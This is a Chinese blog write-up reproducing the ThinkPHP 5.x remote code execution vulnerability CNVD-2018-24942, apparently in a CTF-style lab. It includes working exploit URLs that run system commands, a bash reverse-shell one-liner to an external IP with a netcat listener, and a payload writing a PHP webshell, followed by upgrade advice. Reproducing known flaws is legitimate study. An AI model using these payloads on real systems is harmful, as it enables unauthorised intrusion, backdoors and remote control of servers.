CNVD-2018-24942复现

  • CNVD-2018-24942复现已关闭评论
  • 40 views
  • A+

ThinkPHP5 远程代码执行漏洞

漏洞描述

**ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。

**

ThinkPHP采用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式,是一款兼容性高、部署简单的轻量级国产PHP开发框架。

2018年12月9日,ThinkPHP团队发布了版本更新信息,修复一个远程代码执行漏洞。该漏洞是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由的情况下可远程执行代码。攻击者利用该漏洞,可在未经授权的情况下,对目标网站进行远程命令执行攻击。

CNVD对该漏洞的综合评级为“高危”。

影响范围

漏洞影响的产品版本包括:

ThinkPHP 5.0—5.1版本。

CNVD秘书处对使用ThinkPHP框架的网站服务器进行探测,数据显示全球使用ThinkPHP框架的服务器规模共有4.3万;按国家分布情况来看,分布前三的分别是中国(3.9万)、美国(4187)和加拿大(471)。

方法一

我们访问页面是这样的

wKg0C2DuhAmAHGD9AABdYifqvHY244.png

在地址后边添加路径与参数就行

/index.php/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /tmp

就得到了fiag

wKg0C2DuhKCAQjioAABt1gCqepg562.png

方法二

远程命令执行

远程代码执行

/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

wKg0C2DuhamAG1qBAACdcsgE44o005.png

```
//弹shell

bash -i >& /dev/tcp/45.92.156.97/8888 0>&1

//攻击机监听

nc -lvvp 8888

```

上传一句话木马

//我们上传一句话
/?s=index/thinktemplatedriverfile/write&cacheFile=shell.php&content=%3C?php%[email protected]($_POST

下载密码:发表评论并刷新可见!
)?%3E

wKg0C2DuhpqAKLV3AADXcs5Gg7A931.png

通过一句话连接

wKg0C2DuhtCAMuJAADb0IuJ2c860.png

wKg0C2DuhtmAG3mpAACyU1IIikw408.png

修复建议

此漏洞是因为框架对传入的路由参数过滤不严格,导致攻击者可以操作非预期的控制器类来远程执行代码。进一步分析发现,某些ThinkPHP版本不受已公开的POC的影响,这是由于该POC缺乏完备性考虑。因此,强烈建议用户及时将5.0.x版本升级到5.0.23,将5.1.x版本升级到5.1.31,以免遭受攻击。

参考

https://blog.csdn.net/qq_45813980/article/details/118463552

https://www.cnvd.org.cn/webinfo/show/4805

相关推荐: CVE-2021-26415提权漏洞

声明,本文为翻译文章,作者Adrian Denkiewicz 文章原地址https://www.cloaked.pl/2021/04/cve-2021-26415/ 前言 我想分享在2021-04-13修复的2021-04-13 CVE-2021-26415 …